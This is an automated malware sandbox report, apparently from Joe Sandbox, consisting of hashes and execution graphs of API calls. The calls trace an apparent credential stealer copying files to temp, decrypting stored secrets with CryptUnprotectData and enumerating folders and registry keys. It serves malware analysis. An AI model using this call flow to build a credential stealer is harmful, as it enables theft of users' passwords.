                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 14988af6992bed95ff49e5332d729cc8b6fc6873304daa01d0e0ecd6f68b95f9
                                                                                                                                                    • Instruction ID: b4eeb6b7a8e22fc0b20cd52bd4268d5d82b2a7f50e66daa442f9e8ea0258ef4d
                                                                                                                                                    • Opcode Fuzzy Hash: 14988af6992bed95ff49e5332d729cc8b6fc6873304daa01d0e0ecd6f68b95f9
                                                                                                                                                    • Instruction Fuzzy Hash: 6341D731A003048FDB15DBB4D4592AEBBF6EFC8305F11456AE805E7391DF75AD428B81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4ebf257692071f45a235390c7f25138413d7abe4d9c23147fb7f2a3fd1b68125
                                                                                                                                                    • Instruction ID: 76ca67c831c89715eeb588ec3a6ff1dc2b1e2ad4fa516915db2df3fae727a6f5
                                                                                                                                                    • Opcode Fuzzy Hash: 4ebf257692071f45a235390c7f25138413d7abe4d9c23147fb7f2a3fd1b68125
                                                                                                                                                    • Instruction Fuzzy Hash: 283106357002108FD75AAF78C49891D77A2AF8A75532609B9E406CF3B5DA35EC41CB80
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 577196194cde6f54e216693e55ef167d11fcf5bc66bd3f2a68d6ad5b878f8143
                                                                                                                                                    • Instruction ID: 52763c98fcd8b18702bfc8edcfc8aeefe12addbf9a3dee01eb23ad44dcb2a570
                                                                                                                                                    • Opcode Fuzzy Hash: 577196194cde6f54e216693e55ef167d11fcf5bc66bd3f2a68d6ad5b878f8143
                                                                                                                                                    • Instruction Fuzzy Hash: 90217F30B00200CFDB05ABB8D5693AEB7E6AFC8305F118465E805E73A1DF75ED828791
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000024.00000002.582316455.00000000001B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_36_2_1b0000_vtjrhji.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7ba65ac32322d89a9bb905e8b89e9e5379c76c0068ae132c7a644734bbb531e2
                                                                                                                                                    • Instruction ID: 7d7ead06f09cba45d8fb46e12807fa19fa14e4182c7302fd3e92f1e4a7f9b4ba
                                                                                                                                                    • Opcode Fuzzy Hash: 7ba65ac32322d89a9bb905e8b89e9e5379c76c0068ae132c7a644734bbb531e2
                                                                                                                                                    • Instruction Fuzzy Hash: 60D05E79109340DFD3029F60FE98E263FB9EB08726F590189E849C7777D625D864CB11

                                                                                                                                                    Execution Graph

                                                                                                                                                    Execution Coverage:2.5%
                                                                                                                                                    Dynamic/Decrypted Code Coverage:53.1%
                                                                                                                                                    Signature Coverage:25.7%
                                                                                                                                                    Total number of Nodes:588
                                                                                                                                                    Total number of Limit Nodes:31
                                                                                                                                                    execution_graph 28441 14f21c 23 API calls 28333 12581f _alldiv _allrem _allmul 28444 12ca01 _allmul _alldiv _allmul _alldiv 28261 124406 28262 122e30 22 API calls 28261->28262 28263 124429 28262->28263 28264 122e30 22 API calls 28263->28264 28265 12443a 28264->28265 28336 159000 28 API calls 28338 165401 memset memcpy memcpy memset memcpy 28445 140e0c 22 API calls 28308 12a40e 28309 12a4a2 28308->28309 28313 12a426 28308->28313 28310 12a4cc ReadFile 28309->28310 28312 12a524 28309->28312 28319 12a501 28309->28319 28310->28309 28310->28312 28311 12a469 memcpy 28311->28309 28322 12a2aa 17 API calls 28312->28322 28313->28309 28313->28311 28314 12a44a memcpy 28313->28314 28317 12a45d 28314->28317 28316 12a532 28316->28317 28318 12a53e memset 28316->28318 28318->28317 28321 12a1c6 18 API calls 28319->28321 28321->28317 28322->28316 28342 13943d 35 API calls 28343 15e024 84 API calls 28345 12482b 14 API calls 28346 14742e 25 API calls 28348 147c28 8 API calls 28350 167452 19 API calls 28452 125e5a 28 API calls 28135 12105d VirtualFree 28215 123c40 28216 121b6a 2 API calls 28215->28216 28217 123c50 28216->28217 28218 123dfa 28217->28218 28251 121000 GetProcessHeap RtlAllocateHeap 28217->28251 28220 123c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28221 174bec 80 API calls 28220->28221 28224 123c9a 28221->28224 28222 123dec DeleteFileW 28223 121011 3 API calls 28222->28223 28223->28218 28224->28222 28225 123de3 28224->28225 28252 121000 GetProcessHeap RtlAllocateHeap 28224->28252 28260 173848 67 API calls 28225->28260 28228 123cce 28253 1402ec 85 API calls 28228->28253 28230 123da8 28256 13fb92 84 API calls 28230->28256 28232 123db1 lstrlen 28233 123db9 28232->28233 28234 123ddc 28232->28234 28257 121798 lstrlen 28233->28257 28237 121011 3 API calls 28234->28237 28235 121fa7 19 API calls 28244 123cd9 28235->28244 28237->28225 28238 123dc8 28258 121798 lstrlen 28238->28258 28239 123d2b lstrlen 28241 123d35 lstrlen 28239->28241 28239->28244 28241->28244 28242 123dd2 28259 121798 lstrlen 28242->28259 28244->28230 28244->28235 28244->28239 28254 121000 GetProcessHeap RtlAllocateHeap 28244->28254 28255 1402ec 85 API calls 28244->28255 28247 123d46 wsprintfA lstrlen 28248 123d83 lstrcat 28247->28248 28249 123d71 28247->28249 28250 121011 3 API calls 28248->28250 28249->28248 28250->28244 28251->28220 28252->28228 28253->28244 28254->28247 28255->28244 28256->28232 28257->28238 28258->28242 28259->28234 28260->28222 28353 124440 24 API calls 28354 146440 85 API calls 28455 1413ca 93 API calls 28456 189238 LoadLibraryA GetProcAddress VirtualProtect VirtualProtect 28458 140670 _allmul _allmul _allmul _alldvrm 28360 17507d 24 API calls 28363 13807c 23 API calls 28364 162864 25 API calls 28366 13f86a 32 API calls 28463 153e6b 20 API calls 28367 124c6d 17 API calls 28371 162c9e 96 API calls 28465 12629a 23 API calls 28466 14069d _allmul 28072 123098 28073 121b6a 2 API calls 28072->28073 28074 1230af 28073->28074 28080 1233a9 28074->28080 28096 121000 GetProcessHeap RtlAllocateHeap 28074->28096 28076 1230ed GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28077 174bec 80 API calls 28076->28077 28082 123126 28077->28082 28078 12339b DeleteFileW 28079 121011 3 API calls 28078->28079 28079->28080 28081 123392 28101 173848 67 API calls 28081->28101 28082->28078 28082->28081 28097 1402ec 85 API calls 28082->28097 28085 123381 28100 13fb92 84 API calls 28085->28100 28088 12319c RtlCompareMemory 28089 1232cd CryptUnprotectData 28088->28089 28095 123155 28088->28095 28089->28095 28090 1231d0 RtlZeroMemory 28098 121000 GetProcessHeap RtlAllocateHeap 28090->28098 28092 121fa7 19 API calls 28092->28095 28093 121011 3 API calls 28093->28095 28094 121798 lstrlen 28094->28095 28095->28085 28095->28088 28095->28089 28095->28090 28095->28092 28095->28093 28095->28094 28099 1402ec 85 API calls 28095->28099 28096->28076 28097->28095 28098->28095 28099->28095 28100->28081 28101->28078 28467 136698 31 API calls 28471 130284 26 API calls 28375 16348f 27 API calls 28376 126eb7 24 API calls 28377 1248b1 22 API calls 28378 122cb5 16 API calls 28379 1378b9 34 API calls 28380 1413ca 78 API calls 28476 1413ca 80 API calls 28477 1296bc _alldiv _alldiv _alldiv _alldiv _allmul 28479 1412bb _allmul _allmul _allmul _alldvrm _allmul 28480 1256a2 _allrem 28266 129ea7 RtlAllocateHeap 28267 129ec1 28266->28267 28268 129ed9 28266->28268 28270 127f70 17 API calls 28267->28270 28270->28268 28381 13b8a6 81 API calls 28271 1224a4 28274 122198 RtlZeroMemory GetVersionExW 28271->28274 28275 1221cb LoadLibraryW 28274->28275 28277 12249b 28275->28277 28278 1221fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 28275->28278 28279 122492 FreeLibrary 28278->28279 28287 122244 28278->28287 28279->28277 28280 12247b 28280->28279 28281 1222e1 RtlCompareMemory 28281->28287 28282 122365 RtlCompareMemory 28282->28287 28283 121953 6 API calls 28283->28287 28284 121011 GetProcessHeap HeapFree VirtualQuery 28284->28287 28285 1223f8 StrStrIW 28285->28287 28286 1217c0 9 API calls 28286->28287 28287->28279 28287->28280 28287->28281 28287->28282 28287->28283 28287->28284 28287->28285 28287->28286 28291 122ea5 25 API calls 28382 13b0aa 75 API calls 28386 1570de 24 API calls 28485 14c6da 23 API calls 28389 125cc5 22 API calls 28390 135cca 33 API calls 28391 126eb7 22 API calls 28392 1734ca 48 API calls 28489 14faca _allmul strcspn 28394 1413ca 80 API calls 28492 159ef6 105 API calls 28395 124cf5 memset 28396 1228f8 101 API calls 28493 1413ca 79 API calls 28295 129ee8 28296 129ef1 HeapFree 28295->28296 28299 129f1a 28295->28299 28297 129f02 28296->28297 28296->28299 28300 127f70 17 API calls 28297->28300 28300->28299 28398 12f4ec 20 API calls 28494 146b14 memset memcpy _allmul 28399 174116 30 API calls 27909 123717 27910 121b6a 2 API calls 27909->27910 27912 12372e 27910->27912 27911 123c23 27912->27911 27959 121000 GetProcessHeap RtlAllocateHeap 27912->27959 27914 12376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27915 1237a8 27914->27915 27916 12379e 27914->27916 27960 174bec 27915->27960 27971 12349b 31 API calls 27916->27971 27919 123c15 DeleteFileW 27920 121011 3 API calls 27919->27920 27920->27911 27921 1237b3 27921->27919 27922 123c0c 27921->27922 27972 121000 GetProcessHeap RtlAllocateHeap 27921->27972 27982 173848 67 API calls 27922->27982 27925 1237e3 27973 1402ec 85 API calls 27925->27973 27927 123bcc 27978 13fb92 84 API calls 27927->27978 27929 123bd9 lstrlen 27930 123c05 27929->27930 27931 123be5 27929->27931 27932 121011 3 API calls 27930->27932 27979 121798 lstrlen 27931->27979 27932->27922 27935 123bf3 27980 121798 lstrlen 27935->27980 27936 123833 RtlCompareMemory 27937 123a37 CryptUnprotectData 27936->27937 27943 1237ee 27936->27943 27937->27943 27939 123bfc 27981 121798 lstrlen 27939->27981 27941 123867 RtlZeroMemory 27974 121000 GetProcessHeap RtlAllocateHeap 27941->27974 27943->27927 27943->27936 27943->27937 27943->27941 27944 121011 3 API calls 27943->27944 27945 121fa7 19 API calls 27943->27945 27946 123b0f lstrlen 27943->27946 27948 121000 GetProcessHeap RtlAllocateHeap 27943->27948 27949 123987 lstrlen 27943->27949 27953 123ba3 lstrcat 27943->27953 27975 122112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27943->27975 27976 122112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27943->27976 27977 1402ec 85 API calls 27943->27977 27944->27943 27945->27943 27946->27943 27947 123b21 lstrlen 27946->27947 27947->27943 27948->27943 27949->27943 27952 123999 lstrlen 27949->27952 27951 123b66 wsprintfA lstrlen 27951->27943 27951->27953 27952->27943 27953->27943 27955 1239de wsprintfA lstrlen 27956 123a1b lstrcat 27955->27956 27957 123a0d 27955->27957 27958 121011 3 API calls 27956->27958 27957->27956 27958->27943 27959->27914 27983 17307c 27960->27983 27962 174c01 27970 174c44 27962->27970 27993 13c54d memset 27962->27993 27964 174c18 27994 13c871 21 API calls 27964->27994 27966 174c2a 27995 13c518 19 API calls 27966->27995 27968 174c33 27968->27970 27996 17486f 80 API calls 27968->27996 27970->27921 27971->27915 27972->27925 27973->27943 27974->27943 27975->27955 27976->27951 27977->27943 27978->27929 27979->27935 27980->27939 27981->27930 27982->27919 27984 173095 27983->27984 27987 17308e 27983->27987 27985 1730ad 27984->27985 28010 1266ce 17 API calls 27984->28010 27985->27987 27988 1730ed memset 27985->27988 27987->27962 27989 173108 27988->27989 27990 173116 27989->27990 28011 12c59d 17 API calls 27989->28011 27990->27987 27997 126512 27990->27997 27993->27964 27994->27966 27995->27968 27996->27970 28012 12685c 27997->28012 27999 12651d 27999->27987 28000 126519 28000->27999 28001 12bfec GetSystemInfo 28000->28001 28015 1265bd 28001->28015 28003 12c00e 28004 1265bd 16 API calls 28003->28004 28005 12c01a 28004->28005 28006 1265bd 16 API calls 28005->28006 28007 12c026 28006->28007 28008 1265bd 16 API calls 28007->28008 28009 12c032 28008->28009 28009->27987 28010->27985 28011->27990 28013 17307c 17 API calls 28012->28013 28014 126861 28013->28014 28014->28000 28016 17307c 17 API calls 28015->28016 28017 1265c2 28016->28017 28017->28003 28495 122b15 50 API calls 28067 12411b 28068 124045 50 API calls 28067->28068 28069 12412b 28068->28069 28070 124045 50 API calls 28069->28070 28071 12413b 28070->28071 28401 1384a7 31 API calls 28499 156f06 24 API calls 28292 124108 28293 124045 50 API calls 28292->28293 28294 124118 28293->28294 28323 189304 28325 189344 28323->28325 28324 189584 28324->28324 28325->28324 28326 1894da LoadLibraryA 28325->28326 28330 18951f VirtualProtect VirtualProtect 28325->28330 28327 1894f1 28326->28327 28327->28325 28329 189503 GetProcAddress 28327->28329 28329->28327 28331 189519 28329->28331 28330->28324 28501 145f08 93 API calls 28502 13ff32 21 API calls 28403 14f130 22 API calls 28404 139534 40 API calls 28505 130f3e 51 API calls 28506 137b3d 18 API calls 28509 16c322 27 API calls 28406 129925 18 API calls 28511 15072d 19 API calls 28512 12cb2a _allmul _allmul 28407 130128 23 API calls 27725 124151 27728 124045 27725->27728 27747 123fdc 27728->27747 27731 123fdc 50 API calls 27732 12407a 27731->27732 27733 123fdc 50 API calls 27732->27733 27734 12408d 27733->27734 27735 123fdc 50 API calls 27734->27735 27736 1240a0 27735->27736 27737 123fdc 50 API calls 27736->27737 27738 1240b3 27737->27738 27739 123fdc 50 API calls 27738->27739 27740 1240c6 27739->27740 27741 123fdc 50 API calls 27740->27741 27742 1240d9 27741->27742 27743 123fdc 50 API calls 27742->27743 27744 1240ec 27743->27744 27745 123fdc 50 API calls 27744->27745 27746 1240ff 27745->27746 27758 121afe 27747->27758 27750 12403f 27750->27731 27756 124038 27821 121011 27756->27821 27826 121000 GetProcessHeap RtlAllocateHeap 27758->27826 27760 121b0d SHGetFolderPathW 27761 121b20 27760->27761 27765 121b63 27760->27765 27762 121011 3 API calls 27761->27762 27763 121b28 27762->27763 27763->27765 27827 1219e5 27763->27827 27765->27750 27766 12199d 27765->27766 27842 121953 27766->27842 27768 1219a6 27769 121011 3 API calls 27768->27769 27770 1219af 27769->27770 27771 123ed9 27770->27771 27772 123fd1 27771->27772 27773 123eed 27771->27773 27772->27756 27793 121d4a 27772->27793 27773->27772 27848 121000 GetProcessHeap RtlAllocateHeap 27773->27848 27775 123f01 PathCombineW FindFirstFileW 27776 123f27 27775->27776 27777 123fca 27775->27777 27778 123f32 lstrcmpiW 27776->27778 27779 123f78 lstrcmpiW 27776->27779 27849 121000 GetProcessHeap RtlAllocateHeap 27776->27849 27780 121011 3 API calls 27777->27780 27781 123f42 lstrcmpiW 27778->27781 27782 123faf FindNextFileW 27778->27782 27779->27776 27779->27782 27780->27772 27781->27782 27783 123f56 27781->27783 27782->27776 27785 123fc3 FindClose 27782->27785 27866 121000 GetProcessHeap RtlAllocateHeap 27783->27866 27785->27777 27787 123f92 PathCombineW 27850 123e04 27787->27850 27788 123f60 PathCombineW 27790 123ed9 23 API calls 27788->27790 27791 123f76 27790->27791 27792 121011 3 API calls 27791->27792 27792->27782 27794 121d62 27793->27794 27795 121eb4 27793->27795 27794->27795 27899 1219b4 27794->27899 27795->27756 27798 121d8b 27800 121953 6 API calls 27798->27800 27799 121d79 27801 121953 6 API calls 27799->27801 27802 121d83 27800->27802 27801->27802 27802->27795 27803 121da3 FindFirstFileW 27802->27803 27804 121ead 27803->27804 27811 121dba 27803->27811 27805 121011 3 API calls 27804->27805 27805->27795 27806 121dc5 lstrcmpiW 27808 121e8e FindNextFileW 27806->27808 27809 121ddd lstrcmpiW 27806->27809 27807 121953 6 API calls 27807->27811 27810 121ea2 FindClose 27808->27810 27808->27811 27809->27808 27818 121df5 27809->27818 27810->27804 27811->27806 27811->27807 27812 12199d 9 API calls 27811->27812 27814 121e54 lstrcmpiW 27812->27814 27813 1219b4 lstrlenW 27813->27818 27814->27818 27816 121011 3 API calls 27816->27808 27817 121953 6 API calls 27817->27818 27818->27813 27818->27816 27818->27817 27819 12199d 9 API calls 27818->27819 27820 121d4a 12 API calls 27818->27820 27903 121cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27818->27903 27819->27818 27820->27818 27904 121162 VirtualQuery 27821->27904 27824 12102d 27824->27750 27825 12101d GetProcessHeap HeapFree 27825->27824 27826->27760 27828 1219f7 27827->27828 27829 1219fa RegOpenKeyExW 27827->27829 27828->27829 27830 121aa2 27829->27830 27831 121a28 RegQueryValueExW 27829->27831 27832 121ab9 27830->27832 27835 1219e5 5 API calls 27830->27835 27833 121a46 27831->27833 27834 121a94 RegCloseKey 27831->27834 27832->27763 27833->27834 27841 121000 GetProcessHeap RtlAllocateHeap 27833->27841 27834->27830 27834->27832 27835->27832 27837 121a61 RegQueryValueExW 27838 121a8b 27837->27838 27839 121a7f 27837->27839 27840 121011 3 API calls 27838->27840 27839->27834 27840->27839 27841->27837 27843 121964 lstrlenW lstrlenW 27842->27843 27847 121000 GetProcessHeap RtlAllocateHeap 27843->27847 27846 121986 lstrcatW lstrcatW 27846->27768 27847->27846 27848->27775 27849->27787 27867 121b6a 27850->27867 27852 123e0f 27857 123ec7 27852->27857 27873 121c31 CreateFileW 27852->27873 27857->27791 27860 123ebf 27861 121011 3 API calls 27860->27861 27861->27857 27862 123ea8 27864 121011 3 API calls 27862->27864 27863 123e6c RtlCompareMemory 27863->27862 27865 123e7e CryptUnprotectData 27863->27865 27864->27860 27865->27862 27866->27788 27868 121b99 27867->27868 27869 121b6f 27867->27869 27868->27852 27869->27868 27870 121b76 CreateFileW 27869->27870 27871 121b95 27870->27871 27872 121b8d CloseHandle 27870->27872 27871->27852 27872->27871 27874 121c53 GetFileSize 27873->27874 27875 121c98 27873->27875 27876 121c63 27874->27876 27877 121c90 CloseHandle 27874->27877 27875->27857 27884 122fb1 27875->27884 27896 121000 GetProcessHeap RtlAllocateHeap 27876->27896 27877->27875 27879 121c6b ReadFile 27880 121c80 27879->27880 27881 121c87 27879->27881 27880->27877 27880->27881 27882 121011 3 API calls 27881->27882 27883 121c8e 27882->27883 27883->27877 27885 122ff2 27884->27885 27886 122fb8 StrStrIA 27884->27886 27885->27857 27890 12123b lstrlen 27885->27890 27886->27885 27887 122fcd lstrlen StrStrIA 27886->27887 27887->27885 27888 122fe7 27887->27888 27897 12190b 6 API calls 27888->27897 27891 121256 CryptStringToBinaryA 27890->27891 27892 12129b 27890->27892 27891->27892 27893 121272 27891->27893 27892->27860 27892->27862 27892->27863 27898 121000 GetProcessHeap RtlAllocateHeap 27893->27898 27895 12127e CryptStringToBinaryA 27895->27892 27896->27879 27897->27885 27898->27895 27900 1219bc 27899->27900 27902 1219d4 27899->27902 27901 1219c3 lstrlenW 27900->27901 27900->27902 27901->27902 27902->27798 27902->27799 27903->27818 27905 121019 27904->27905 27905->27824 27905->27825 28410 12a558 18 API calls 28411 14e558 22 API calls 28516 146340 83 API calls 28412 14e141 18 API calls 28517 13f74d 18 API calls 28018 122f77 28023 122e30 StrStrIW 28018->28023 28021 122e30 22 API calls 28022 122fab 28021->28022 28024 122e57 28023->28024 28029 122ebc 28023->28029 28025 1219e5 9 API calls 28024->28025 28027 122e68 28025->28027 28027->28029 28050 121bc5 10 API calls 28027->28050 28028 122ed0 RegOpenKeyExW 28030 122f68 28028->28030 28040 122eee 28028->28040 28049 121000 GetProcessHeap RtlAllocateHeap 28029->28049 28032 121011 3 API calls 28030->28032 28031 122f50 RegEnumKeyExW 28034 122f5e RegCloseKey 28031->28034 28031->28040 28035 122f6f 28032->28035 28034->28030 28035->28021 28036 122e75 28038 122eb5 28036->28038 28039 121afe 10 API calls 28036->28039 28037 121953 6 API calls 28037->28040 28041 121011 3 API calls 28038->28041 28042 122e83 28039->28042 28040->28031 28040->28037 28043 12199d 9 API calls 28040->28043 28045 122e30 18 API calls 28040->28045 28047 121011 3 API calls 28040->28047 28041->28029 28044 12199d 9 API calls 28042->28044 28048 122e91 28042->28048 28043->28040 28044->28048 28045->28040 28046 121011 3 API calls 28046->28038 28047->28040 28048->28046 28049->28028 28050->28036 28416 13c97b memcpy 28519 147f67 25 API calls 28521 157762 memset memset memcpy 28418 155d6f 20 API calls 28522 12ab68 20 API calls 28419 13a16f 34 API calls 28523 1413ca 79 API calls 28524 13cb91 18 API calls 28421 13fd97 19 API calls 28526 12bf9a _alldiv 28422 121198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28527 121b9d GetFileAttributesW 28530 13ab8b 19 API calls 28423 147d8b _allrem memcpy 28532 1633b7 27 API calls 28425 149dbc 25 API calls 28533 1413ca 80 API calls 28534 148ba6 7 API calls 28426 1311a0 34 API calls 28535 1653ad memset memcpy memset memcpy 28102 1243d9 28109 124317 _alloca_probe RegOpenKeyW 28102->28109 28105 124317 25 API calls 28106 1243f5 28105->28106 28107 124317 25 API calls 28106->28107 28108 124403 28107->28108 28110 124343 RegEnumKeyExW 28109->28110 28111 1243cf 28109->28111 28112 1243c4 RegCloseKey 28110->28112 28113 12436d 28110->28113 28111->28105 28112->28111 28114 121953 6 API calls 28113->28114 28115 12199d 9 API calls 28113->28115 28117 121011 3 API calls 28113->28117 28120 12418a 28113->28120 28114->28113 28115->28113 28118 12439b RegEnumKeyExW 28117->28118 28118->28113 28119 1243c3 28118->28119 28119->28112 28121 12430d 28120->28121 28129 1241a3 28120->28129 28121->28113 28122 1219e5 9 API calls 28122->28129 28124 124205 wsprintfW 28125 121011 3 API calls 28124->28125 28125->28129 28126 121011 GetProcessHeap HeapFree VirtualQuery 28126->28129 28128 1217c0 9 API calls 28128->28129 28129->28121 28129->28122 28129->28126 28129->28128 28130 121000 GetProcessHeap RtlAllocateHeap 28129->28130 28131 121fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28129->28131 28130->28124 28131->28129 28536 12ebd9 24 API calls 28136 1215dd 28137 1215f3 lstrlen 28136->28137 28138 121600 28136->28138 28137->28138 28147 121000 GetProcessHeap RtlAllocateHeap 28138->28147 28140 121608 lstrcat 28141 121644 28140->28141 28142 12163d lstrcat 28140->28142 28148 121333 28141->28148 28142->28141 28145 121011 3 API calls 28146 121667 28145->28146 28147->28140 28171 121000 GetProcessHeap RtlAllocateHeap 28148->28171 28150 121357 28172 12106c lstrlen MultiByteToWideChar 28150->28172 28152 121366 28173 1212a3 RtlZeroMemory 28152->28173 28155 1213b8 RtlZeroMemory 28159 1213ed 28155->28159 28156 121011 3 API calls 28157 1215d2 28156->28157 28157->28145 28158 1215b5 28158->28156 28159->28158 28175 121000 GetProcessHeap RtlAllocateHeap 28159->28175 28161 1214a7 wsprintfW 28163 1214c9 28161->28163 28162 1215a1 28164 121011 3 API calls 28162->28164 28163->28162 28176 121000 GetProcessHeap RtlAllocateHeap 28163->28176 28164->28158 28166 121533 28167 12159a 28166->28167 28177 12104c VirtualAlloc 28166->28177 28169 121011 3 API calls 28167->28169 28169->28162 28170 12158a RtlMoveMemory 28170->28167 28171->28150 28172->28152 28174 1212c5 28173->28174 28174->28155 28174->28158 28175->28161 28176->28166 28177->28170 28178 1263dd 28181 12b87b 28178->28181 28179 1263f4 28182 12b88d memset 28181->28182 28190 12b8e5 28182->28190 28186 12ba3c 28186->28179 28187 12b965 CreateFileW 28187->28190 28190->28182 28190->28186 28190->28187 28191 12ba14 28190->28191 28192 12ba41 28190->28192 28197 12b609 28190->28197 28200 12b828 28190->28200 28204 12b64b 18 API calls 28190->28204 28205 12bb9f 18 API calls 28190->28205 28206 12a2aa 17 API calls 28190->28206 28207 12a1c6 18 API calls 28191->28207 28209 1752ae _allmul 28192->28209 28194 12ba32 28208 174db2 17 API calls 28194->28208 28210 12a08a 28197->28210 28199 12b60f 28199->28190 28201 12b842 GetFileAttributesExW 28200->28201 28202 12b861 28201->28202 28203 12b852 28201->28203 28202->28190 28203->28201 28203->28202 28204->28190 28205->28190 28206->28190 28207->28194 28208->28186 28209->28186 28211 12a0a4 28210->28211 28213 12a0aa 28211->28213 28214 126a81 memset 28211->28214 28213->28199 28214->28213 28537 1573c4 22 API calls 28301 129fc8 28302 129fd3 28301->28302 28304 129fd8 28301->28304 28303 129ff4 HeapCreate 28303->28302 28305 12a004 28303->28305 28304->28302 28304->28303 28307 127f70 17 API calls 28305->28307 28307->28302 28540 1413ca 80 API calls 28430 173dc8 24 API calls 28431 1249f1 13 API calls 28543 139ff0 33 API calls 28432 12d1f7 memset _allmul _allmul 28544 1413ca 63 API calls 28051 1247fa 28058 12479c 28051->28058 28054 12479c 23 API calls 28055 124813 28054->28055 28056 12479c 23 API calls 28055->28056 28057 12481f 28056->28057 28059 121afe 10 API calls 28058->28059 28060 1247af 28059->28060 28061 1247f1 28060->28061 28062 12199d 9 API calls 28060->28062 28061->28054 28063 1247bf 28062->28063 28064 1247ea 28063->28064 28066 121d4a 18 API calls 28063->28066 28065 121011 3 API calls 28064->28065 28065->28061 28066->28063 28433 12b1e3 24 API calls 28434 1299e1 strncmp 28548 147be1 30 API calls 28436 12c9ea _allmul _alldiv 28439 1755eb IsProcessorFeaturePresent

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 0 123717-123730 call 121b6a 3 123736-12374c 0->3 4 123c37-123c3d 0->4 5 123762-12379c call 121000 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 3->5 6 12374e-123757 call 12302d 3->6 11 1237a8-1237b5 call 174bec 5->11 12 12379e-1237a3 call 12349b 5->12 9 12375c-12375e 6->9 9->5 16 123c15-123c1e DeleteFileW call 121011 11->16 17 1237bb-1237d3 call 15eeb8 11->17 12->11 21 123c23-123c28 16->21 22 1237d9-1237f1 call 121000 call 1402ec 17->22 23 123c0c-123c10 call 173848 17->23 21->4 24 123c2a-123c32 call 122ffa 21->24 31 123bd0-123be3 call 13fb92 lstrlen 22->31 32 1237f7 22->32 23->16 24->4 37 123c05-123c07 call 121011 31->37 38 123be5-123c00 call 121798 * 3 31->38 34 1237fc-123816 call 121fa7 32->34 42 123bb6-123bc6 call 1402ec 34->42 43 12381c-12382d 34->43 37->23 38->37 42->34 53 123bcc 42->53 46 123833-123843 RtlCompareMemory 43->46 47 123a37-123a51 CryptUnprotectData 43->47 46->47 48 123849-12384b 46->48 47->42 50 123a57-123a5c 47->50 48->47 52 123851-123856 48->52 50->42 54 123a62-123a78 call 121fa7 50->54 52->47 56 12385c-123861 52->56 53->31 61 123a86-123a9d call 121fa7 54->61 62 123a7a-123a80 54->62 56->47 59 123867-1238ed RtlZeroMemory call 121000 56->59 73 1238f3-123909 call 121fa7 59->73 74 123a2e-123a32 59->74 68 123aab-123ac2 call 121fa7 61->68 69 123a9f-123aa5 61->69 62->61 64 123a82 62->64 64->61 79 123ad0-123aed call 121fa7 68->79 80 123ac4-123aca 68->80 69->68 71 123aa7 69->71 71->68 83 123917-12392d call 121fa7 73->83 84 12390b-123911 73->84 77 123bb1 call 121011 74->77 77->42 90 123af7-123b01 79->90 91 123aef-123af1 79->91 80->79 82 123acc 80->82 82->79 92 12393b-123952 call 121fa7 83->92 93 12392f-123935 83->93 84->83 86 123913 84->86 86->83 95 123b03-123b05 90->95 96 123b0f-123b1b lstrlen 90->96 91->90 94 123af3 91->94 103 123960-123979 call 121fa7 92->103 104 123954-12395a 92->104 93->92 97 123937 93->97 94->90 95->96 99 123b07-123b0b 95->99 96->42 100 123b21-123b2a lstrlen 96->100 97->92 99->96 100->42 102 123b30-123b4f call 121000 100->102 110 123b51 102->110 111 123b59-123b93 call 122112 wsprintfA lstrlen 102->111 112 123987-123993 lstrlen 103->112 113 12397b-123981 103->113 104->103 106 12395c 104->106 106->103 110->111 118 123ba3-123baf lstrcat 111->118 119 123b95-123ba1 call 12102f 111->119 112->74 117 123999-1239a2 lstrlen 112->117 113->112 115 123983 113->115 115->112 117->74 120 1239a8-1239c7 call 121000 117->120 118->77 119->118 125 1239d1-123a0b call 122112 wsprintfA lstrlen 120->125 126 1239c9 120->126 129 123a1b-123a29 lstrcat call 121011 125->129 130 123a0d-123a19 call 12102f 125->130 126->125 129->74 130->129
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00121B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 00121B82
